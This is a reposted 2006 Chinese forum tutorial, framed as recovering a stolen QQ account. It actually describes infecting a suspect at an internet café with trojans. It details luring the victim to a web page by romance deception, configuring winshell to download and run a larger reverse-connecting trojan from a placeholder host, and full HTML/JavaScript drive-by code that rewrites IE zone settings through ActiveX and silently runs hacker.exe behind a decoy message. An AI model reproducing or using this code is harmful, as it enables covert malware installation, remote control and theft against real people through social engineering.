ORF反垃圾邮件系统

邮件服务器-邮件系统-邮件技术论坛(BBS)

 找回密码
 会员注册
查看: 5263|回复: 3
打印 上一主题 下一主题

[转帖]教你找回被盗的QQ

[复制链接]
跳转到指定楼层
顶楼
发表于 2006-4-23 00:21:19 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
黑客动画吧 黑客小质原创 地址:<a target=_blank href=http://www.hack58.com/bbs.htm>http://www.hack58.com/bbs.htm</a> <br>
<br>
<br>
<br>
<br>
今天早上刚到学校,就有个同学对我说他的QQ被别人盗了!(这还了得?欺负到我哥们的头上来啦.)我于是对他说:“放心,包在我身上,我肯定给你找回来!”其实我心里也没底,对方既然能偷OICQ,那么多少会有点安全意识的! 放学回家后,打开我的QQ,看到同学的头像正好亮着,查一下IP,好像和我在同一个城市。根据后边的端口号初步判断这家伙可能是在网吧(因为不是默认的4000,4001或5000)。我放弃了入侵他的念头,因为我们这里的网吧大部分用的是98,而98又很难入侵,所以我决定换一种方法。 经过20多分钟的苦思冥想终于被我想到了一种方法(不要夸我办事效率高哦)。要让他浏览网页,然后染上 木马 。之后就…………<br>
<br>但这里有三个问题需要解决: <br>
<br>
1,如何让对方乖乖的浏览网页。 <br>
<br>
2,对方在局域网内,用普通的 木马 肯定不行。<br>
<br>
3,如果 木马 的服务端过大,很容易被发现。<br>
<br>
其实第一个问题很容易解决,只要装作一个清纯MM或GG欺骗对方感情就行了。第二条也不算太难,用个反弹式的 木马 就行了。但这第三条却不太容易解决,因为现在的反弹 木马 最小的也要30多KB,如果把它放在网页上让对方浏览的话,肯定会出现一个下载框在屏幕上“晃悠”半天。但经过我前面20多分钟的思考,我终于想出了如下的解决办法:<br>
<br>
1,申请一个主页 空间 。<br>
<br>
2,配置winshell5.0的服务端。你也许会问,这个 木马 并不是反弹式的 木马 啊,为什么要用它呢?别急,我之所以要用它的原因有二。一是它的服务端非常的小,才5KB左右。二是因为它里面有一个非常有用的功能。(如图一所示)看到我用红色圈起来的那部分了么?那就是我说的有用的功能,其中DownExec的意思是:“当winshell运行的时候自动下载可执行文件并运行。”Url Address是可执行文件的地址。Destination Filename是下载后的文件名。那么,当对方运行了我们配置好的winshell的时候,就可以让他神不知鬼不觉得去下载真正并且庞大的反弹式 木马 的服务端了! <br>
<br>
3,将winshell加再网页中,然后把网页,winshell,和命名为huigezi.exe的反弹 木马 服务端一起上传到xxx.abc.com/(我这里用的是灰鸽子)。 之后我利用“美人计”让那小子乖乖的浏览了我的网页。图二就是证据! 至于如何在网页中加入 木马 程序,在这里只说说我从网上找到的一种方法,其他的自己去研究吧! 具体方法如下: 开启第一个HTML的页面,通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们所要执行的EXE文件。 将如下代码保存为index.htm文件: <!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN> <CNTER><HTML><HEAD> <META http-equiv=Content-Type content=text/html; charset=gb2312> <META content=Microsoft FrontPage 4.0 name=GENERATOR></HEAD> <BODY> <SCRIPT> document.write(<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>); function f(){ try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228}); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID({F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}); a1.createInstance(); Net = a1.GetObject(); try { if (documents.cookie.indexOf(Chg) == -1) { Shl.RegWrite (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004,0,REG_DWORD); var expdate = new Date((new Date()).getTime() + (1)); documents.cookie=Chg=general; expires= + expdate.toGMTString() + ; path=/; } } catch(e) {} } catch(e) {} } function init() { setTimeout(f(), 1000); } init(); </SCRIPT> <script language=javascript> <!-- Begin function opencolortext(){ window.open(’<a target=_blank href=http://xxx.abc.com/2.htm>http://xxx.abc.com/2.htm</a>’,’colortext’) } setTimeout(opencolortext(),1500) // End --> </script> </BODY></HTML> 下面制作2.htm文件: <!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN> <HTML><HEAD> <META http-equiv=Content-Type content=text/html; charset=gb2312> <SCRIPT language=javascript> run_exe=<OBJECT ID=\RUNIT\ WIDTH=0 HEIGHT=0 TYPE=\application/x-oleobject\ run_exe+=CODEBASE=\hacker.exe#version=1,1,1,1\> run_exe+=<PARAM NAME=\_Version\ value=\65536\> run_exe+=</OBJECT> run_exe+=<HTML><H1> </H1></HTML>; document.open(); document.clear(); document.writeln(run_exe); document.close(); </SCRIPT> <META content=Microsoft FrontPage 4.0 name=GENERATOR></HEAD> <BODY> <p align=center> 论坛 连接中请勿终断.... <BR> <CENTER></CENTER><BR> <BR></BODY></HTML> 其中hacker.exe就是我们要执行的文件。至于那个“ 论坛 连接中请勿终断....”完全是为了迷惑对方,可根据自己喜好而定。接下来只要将index.htm,2.htm和hacker.exe一起上传到主页的同一目录中就ok了! 总结:这个方法的好处是,如果对方在局域网内,我们同样可以用 木马 进入他的机器并且很难发现。但这个方法也有自己的缺点,那就是用了两种 木马 ,大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中,而我们这里的网吧大多又不安装杀毒软件(用硬盘还原卡代替),并且不升级IE,我这次入侵成功,网吧老板也有一份功劳!
沙发
 楼主| 发表于 2006-4-23 00:22:27 | 只看该作者

re:沙发自己坐,觉得好就给我顶一下啊!!

沙发自己坐,觉得好就给我顶一下啊!!
藤椅
发表于 2006-5-2 13:44:27 | 只看该作者

re:顶~

顶~
板凳
发表于 2006-5-2 22:29:07 | 只看该作者

re:顶~

顶~
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

小黑屋|手机版|Archiver|邮件技术资讯网

GMT+8, 2026-7-28 19:12

Powered by Discuz! X3.2

© 2001-2016 Comsenz Inc.

本论坛为非盈利中立机构,所有言论属发表者个人意见,不代表本论坛立场。内容所涉及版权和法律相关事宜请参考各自所有者的条款。
如认定侵犯了您权利,请联系我们。本论坛原创内容请联系后再行转载并务必保留我站信息。此声明修改不另行通知,保留最终解释权。
*本论坛会员专属QQ群:邮件技术资讯网会员QQ群
*本论坛会员备用QQ群:邮件技术资讯网备用群

快速回复 返回顶部 返回列表